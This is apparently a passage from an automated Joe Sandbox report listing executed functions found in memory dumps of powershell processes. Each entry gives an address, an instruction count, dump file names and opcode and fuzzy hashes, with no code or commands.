                                                                                                                                                                                                                          Function 00007FFB4B0C09CD Relevance: 3.3, Strings: 2, Instructions: 802COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1530389483.00007FFB4B0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffb4b0c0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: .C_H$pl#K
                                                                                                                                                                                                                          • API String ID: 0-2091543979
                                                                                                                                                                                                                          • Opcode ID: 2b05890470cfd0c9dd0a620dd9f619fb7a8a9d8b908806abf93c85912eb930fe
                                                                                                                                                                                                                          • Instruction ID: e2bdeb0c1f140f512958a6fd60bf30323a643c2dafc791878eb22cadff7d20c0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b05890470cfd0c9dd0a620dd9f619fb7a8a9d8b908806abf93c85912eb930fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C03229A290EBC90FE75AAB7888551B57FE1EF56311F0841FBD18DC71E3EA189806C351
                                                                                                                                                                                                                          Function 00007FFB4B0C3545 Relevance: .4, Instructions: 449COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1530389483.00007FFB4B0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffb4b0c0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ef743dac90d8796d3109ca2960457d516705410c58aa08d1b0c8c34ba3e2b3b2
                                                                                                                                                                                                                          • Instruction ID: 31a841bd9b1bda2d9caf39393b212713278b01c9b107f7068fef4e820bc2bfb9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef743dac90d8796d3109ca2960457d516705410c58aa08d1b0c8c34ba3e2b3b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2ED128A292E7894FE7AAAE78C8155B57FF0EF16311B1841FBD14CC72A3DA2898058351
                                                                                                                                                                                                                          Function 00007FFB4B0C0AA7 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1530389483.00007FFB4B0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffb4b0c0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 382d559a8cf101697b4edfe781cae97c4ee3ce2e230128a62c5971e0e02e04c6
                                                                                                                                                                                                                          • Instruction ID: 4a97e924af0b32f8ff0039307ef77d5056d2387e177c2a6bca3e42d06a208991
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 382d559a8cf101697b4edfe781cae97c4ee3ce2e230128a62c5971e0e02e04c6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A31F7A2A0EA860FF7ADAE78C56117876E2EF41256B5440BFD14DC22E2FE199805C341
                                                                                                                                                                                                                          Function 00007FFB4AFF4195 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1529899650.00007FFB4AFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFF0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffb4aff0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                                                                                                                                                                                                                          • Instruction ID: 7f5e55c64afc61e0563434921f11dc960f1ea086ff546fbeb3526c47291574a1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B01677115CB0C8FDB48EF0CE451AA5B7E0FB95364F10056EE58AC3695D636E882CB46

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 00007FFB4B0E09CD Relevance: 3.3, Strings: 2, Instructions: 816COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1664944192.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffb4b0e0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: .A_H$pl%K
                                                                                                                                                                                                                          • API String ID: 0-1758842192
                                                                                                                                                                                                                          • Opcode ID: 7875e4db2bd35d6d45b92d6f4f1bf94e23700f979dff186415f673504dd8f054
                                                                                                                                                                                                                          • Instruction ID: 79c237a756abb05c135bedc8279644127d7be0642c585886d1f0cf4c3a543979
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7875e4db2bd35d6d45b92d6f4f1bf94e23700f979dff186415f673504dd8f054
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 293269A290EBC91FE356AB78C8561B57FD1EF56311F0840FBD18DC76A3E9189806C352
                                                                                                                                                                                                                          Function 00007FFB4B0E354A Relevance: .5, Instructions: 455COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1664944192.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffb4b0e0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 571fd0002ed28b01ec6f1ea6bc7fe494c3f55741138329fc7e8bfe2d74ea8710
                                                                                                                                                                                                                          • Instruction ID: f8d71c47b519c7278d9e5bdc6e5f85dafe5c505f637cc77cdfc7b734342832f8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 571fd0002ed28b01ec6f1ea6bc7fe494c3f55741138329fc7e8bfe2d74ea8710
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86D156A290EA895FE7A6EF78C8155B57FE0EF16311B0840FED58CC72A3DA19AC05C351
                                                                                                                                                                                                                          Function 00007FFB4B0E0AA7 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1664944192.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffb4b0e0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f6f3c4ea6216d0bfda958ea9247a2540dc16b96c8100070181ddae65c9ca0fd6
                                                                                                                                                                                                                          • Instruction ID: 368035157cef17680278ec0b77c757c2011b552a1093ba43c785dcc67677f7c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6f3c4ea6216d0bfda958ea9247a2540dc16b96c8100070181ddae65c9ca0fd6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E73129A2A0EA8B2FF7A97E78C56217876C2FF41256B4840BED14DC2AE2FC0D58058341
                                                                                                                                                                                                                          Function 00007FFB4B014195 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1664388051.00007FFB4B010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B010000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffb4b010000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                                                                                                                                                          • Instruction ID: c3fa2497a3d52519c91be6a809ea90fa72d3cc3a552b1a50faa441a4ec17d2b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C301677111CB0C8FDB48EF0CE451AB5B7E0FB95364F10056DE58AC3665D636E882CB46

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 00007FFB4B0E06A5 Relevance: .5, Instructions: 502COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000010.00000002.1813962816.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffb4b0e0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 53052386e95686169c9ab40513d85dc7571d82428435a9fff3e546adfa574488
                                                                                                                                                                                                                          • Instruction ID: d8b2895b24068e17520d54ae912a778a7032f5be6b02211a89a08db746c24f1f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53052386e95686169c9ab40513d85dc7571d82428435a9fff3e546adfa574488
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63E149A290EBC95FE356AF3899561A47FE0EF47311F0841FBD188C76A3E9195C06C392
                                                                                                                                                                                                                          Function 00007FFB4B0E3255 Relevance: .4, Instructions: 446COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000010.00000002.1813962816.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffb4b0e0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a4d6453f5f644130a5e2bba10058f0ab009407009f602474eb5fc9807b517129
                                                                                                                                                                                                                          • Instruction ID: 5282ad7463c94d191b30971ed38967813c6b4f5c77f6b8fe17320f4c26ee8b25
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4d6453f5f644130a5e2bba10058f0ab009407009f602474eb5fc9807b517129
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22D135A290EA896FE797EE78C8555B57FD0FF56311B0801FED14CC72A3D918A8068351
                                                                                                                                                                                                                          Function 00007FFB4B014196 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000010.00000002.1813388898.00007FFB4B010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B010000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffb4b010000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5952e0301d88501fe669cecb32d5d6fa1a67fb066b70c2fdf5e50c7064cd6e0e
                                                                                                                                                                                                                          • Instruction ID: e1d5514103b5f5435afac9fd7cbf8eb0b7d3a45f24fbbb258f2b77c816128e6f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5952e0301d88501fe669cecb32d5d6fa1a67fb066b70c2fdf5e50c7064cd6e0e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA018CB2B0CA080BD75CAD5CA8431BC73D1E799621B04427FE18EC23A2DE26A80346C6
                                                                                                                                                                                                                          Function 00007FFB4B014182 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000010.00000002.1813388898.00007FFB4B010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B010000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffb4b010000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: da7ac2bedb05257be2116c4359ed823bdb9a532f86bbc5f4ef1b2a8993024a30
                                                                                                                                                                                                                          • Instruction ID: 954421d6436c14bbcf979b0a81a8330e83fe11bb28a3c70cc45761f1a3f21767
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da7ac2bedb05257be2116c4359ed823bdb9a532f86bbc5f4ef1b2a8993024a30
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 470192B2B0CA080BD75CAD5CB8432BC73D1E799621F04027FE18EC33A2DE2658434686
                                                                                                                                                                                                                          Function 00007FFB4B0141A7 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000010.00000002.1813388898.00007FFB4B010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B010000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffb4b010000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 63fed72249cab851f4653241823588e350d0b5d4d6b11fe8e244d57ded66706b
                                                                                                                                                                                                                          • Instruction ID: 0127310653a8b4caf04bc5cba12ef8d2be6febd9597b0190423b58240b653530
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63fed72249cab851f4653241823588e350d0b5d4d6b11fe8e244d57ded66706b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A015EB2B1CA1D1BD75CAD5CA8531B873D1E799621B04437FE18EC33A2DE26980346C6
                                                                                                                                                                                                                          Function 00007FFB4B0133B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000010.00000002.1813388898.00007FFB4B010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B010000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffb4b010000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                          • Instruction ID: 243c62b5e167e88e3156c96cdccebd04ac812e3661c47b400fc415154ea3cba3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101677111CB0C8FDB48EF0CE451AB5B7E0FB95364F10056EE58AC3661DA36E882CB46